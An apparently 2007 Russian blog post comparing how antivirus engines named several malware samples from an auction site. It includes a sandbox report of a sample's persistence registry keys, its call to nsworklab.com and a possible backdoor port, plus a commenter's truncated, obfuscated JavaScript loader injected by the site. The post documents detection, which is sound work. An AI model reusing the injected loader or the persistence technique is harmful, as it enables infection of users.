. . . . . . . . . из книжки верят средне —
Мало ли, что можно в книжке намолоть.
А такое оживит внезапно бредни,
И поверишь . . . . . . . . . |
Попались нежданно-негаданно реальные настоящие три вируса. Скопом проникли на не мой компьютер с какого-то аукционного сайта (предположительно). Гады, да. Но и хорошо же! — ведь можно свору антивирусов стравить и заставить их меряться пис возможностями ихими. Пусть попляшут, попоют!
Antivirus comparision
Antivirus |
Version |
msdnc0.exe |
msdnc1.exe |
undname.exe |
msdnc6.exe |
AhnLab-V3 |
2007.10.2.1 |
Win-Trojan/LdPinch.41984.J |
- |
Win32/Mydoom.worm.46080 |
- |
AntiVir |
7.6.0.18 |
TR/PSW.LdPinch.cds.111 |
TR/Crypt.XPACK.Gen |
TR/Crypt.FKM.Gen |
- |
Authentium |
4.93.8 |
- |
- |
W32/Worm.HUV |
Possibly a new variant of W32/Threat-HLLSI-based!Maximus |
Avast |
4.7.1043.0 |
Win32:Ldpinch-AH |
- |
Win32:Lmir-BK |
Win32:Small-CHC |
AVG |
7.5.0.488 |
PSW.Ldpinch.OMH |
Win32/PolyCrypt |
SpamTool.AQY |
BackDoor.Generic8.TNJ |
BitDefender |
7.2 |
Generic.LdPinch1.ECBDA575 |
Trojan.PWS.LDPinch.TAW |
Win32.Mydoom.ABS |
DeepScan:Generic.Malware.SFdld!g.478689D7 |
CAT-QuickHeal |
9.00 |
TrojanPSW.LdPinch.cds |
- |
I-Worm.Mydoom.bj |
- |
ClamAV |
0.91.2 |
- |
- |
Trojan.Agent-7550 |
- |
DrWeb |
4.44.0.09170 |
Trojan.PWS.LDPinch.1941 |
- |
Trojan.Spambot.2424 |
BackDoor.Kiddy.origin |
eSafe |
7.0.15.0 |
Win32.LdPinch.cds |
- |
suspicious Trojan/Worm |
- |
eTrust-Vet |
31.2.5178 |
- |
Win32/VMalum.YPE |
Win32/Mytob.NV |
- |
Ewido |
4.0 |
Trojan.LdPinch.cdz |
- |
Worm.Mydoom.bj |
- |
Fortinet |
3.11.0.0 |
W32/Basine.C!tr.pws |
- |
PossibleThreat |
W32/Agent.ZGR!tr.bdr |
F-Prot |
4.3.2.48 |
- |
- |
W32/Worm.HUV |
W32/Threat-HLLSI-based!Maximus |
F-Secure |
6.70.13030.0 |
Trojan-PSW.Win32.LdPinch.cds |
W32/PolyCrypt.A |
Email-Worm.Win32.Mydoom.bj |
W32/Malware |
Ikarus |
T3.1.1.12 |
Trojan-Spy.Win32.Agent.DI |
Trojan-PWS.LDPinch.TAW |
Email-Worm.Win32.Mydoom.bj |
- |
Kaspersky |
7.0.0.125 |
Trojan-PSW.Win32.LdPinch.cds |
- |
Email-Worm.Win32.Mydoom.bj |
- |
McAfee |
5131 |
- |
- |
- |
Generic BackDoor.c |
Microsoft |
1.2803 |
PWS:Win32/Ldpinch.gen |
VirTool:Win32/Obfuscator.O |
- |
- |
NOD32v2 |
2564 |
a variant of Win32/PSW.LdPinch.NEL |
- |
Win32/SpamTool.Agent.NAJ |
probably unknown NewHeur_PE virus |
Norman |
5.80.02 |
- |
W32/PolyCrypt.A |
- |
W32/Malware |
Panda |
9.0.0.4 |
Suspicious file |
- |
W32/Mydoom.DL.worm |
Suspicious file |
Prevx1 |
V2 |
Malware.Gen |
Malware.Gen |
Malware.Gen |
Heuristic: Suspicious Backdoor |
Rising |
19.43.00.00 |
- |
- |
Worm.Mail.Win32.Agent.lv |
- |
Sophos |
4.22.0 |
Mal/Basine-C |
Mal/Basine-C |
Mal/Behav-104 |
- |
Sunbelt |
2.2.907.0 |
- |
Infostealer.Ldpinch |
Trojan.Mydoom |
- |
Symantec |
10 |
Infostealer |
- |
W32.Mytob@mm |
Downloader |
TheHacker |
6.2.6.075 |
- |
- |
W32/Mydoom.bj |
- |
VBA32 |
3.12.2.4 |
MalwareScope.Trojan-PSW.Pinch.42 |
Trojan.Packed.170 |
Email-Worm.Win32.Mydoom.bj |
suspected of Backdoor.xBot.1 (paranoid heuristics) |
Webwasher-Gateway |
6.0.1 |
Trojan.PSW.LdPinch.cds.111 |
Trojan.Crypt.XPACK.Gen |
Trojan.Crypt.FKM.Gen |
- |
|
VirusBuster 4.3.26:9 didn't detect anything.
FileAdvisor 1 didn't detect anything.
svshost.exe
was reported by Avast: Win32:Small-CHC and
DrWeb: Trojan.DownLoader.origin.
Norman reported from its sandbox:
[ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: ANALYSIS@NORMAN.NO - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
* Accesses executable file from resource section.
* File length: 13312 bytes.
[ Changes to filesystem ]
* Creates file C:\WINDOWS\SYSTEM32\wininet.exe.
* Creates file C:\WINDOWS\SYSTEM32\svshost.dll.
[ Changes to registry ]
* Sets value "SysRun"="{D7FFD784-5276-42D1-887B-00267870A4C7}" in key "HKLM\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad".
* Creates key "HKCR\CLSID\{D7FFD784-5276-42D1-887B-00267870A4C7}\InProcServer32".
* Sets value ""="C:\WINDOWS\SYSTEM32\svshost.dll" in key "HKCR\CLSID\{D7FFD784-5276-42D1-887B-00267870A4C7}\InProcServer32".
[ Network services ]
* Connects to "nsworklab.com" on port 80 (IP).
* Opens URL: nsworklab.com/ips.txt.
[ Security issues ]
* Possible backdoor functionality [UNKNOWN] port 2803.
Last update of the programs — 2007.10.01 or 2007.10.02.
Соревнование было проведено с помощью сайта virustotal.com.
с этого сайта
Date: 2007-10-02 12:49 pm (UTC)Re: с этого сайта
Date: 2007-10-02 05:13 pm (UTC)<script>document.write(unescape("%3Cscript%3E%0Afunction%20..."))</script>
в котором закодирован скрипт
function dxdc ( x) { var i,j,r,l=x.length,b=(512*2),s=0, w=0, t = Array(63,12,61,26,18,44,29,.........,52,10 ), p=0 ;for (j= Math.ceil(l/b); j > 0; j-- ) {r=''; for(i=Math.min(l,b); i>0; i--, l--) { w |= (t[ x.charCodeAt (p++ ) - 48]) << s; if (s ) { r += String.fromCharCode( 233^w&255 ); w>>=8; s-=2; } else { s=6; }} document.write ( r)}}dxdc("gFDr1X............4EYoq")
который я уж не знаю, что делает. Но вряд ли что полезное. 10.5 КБ.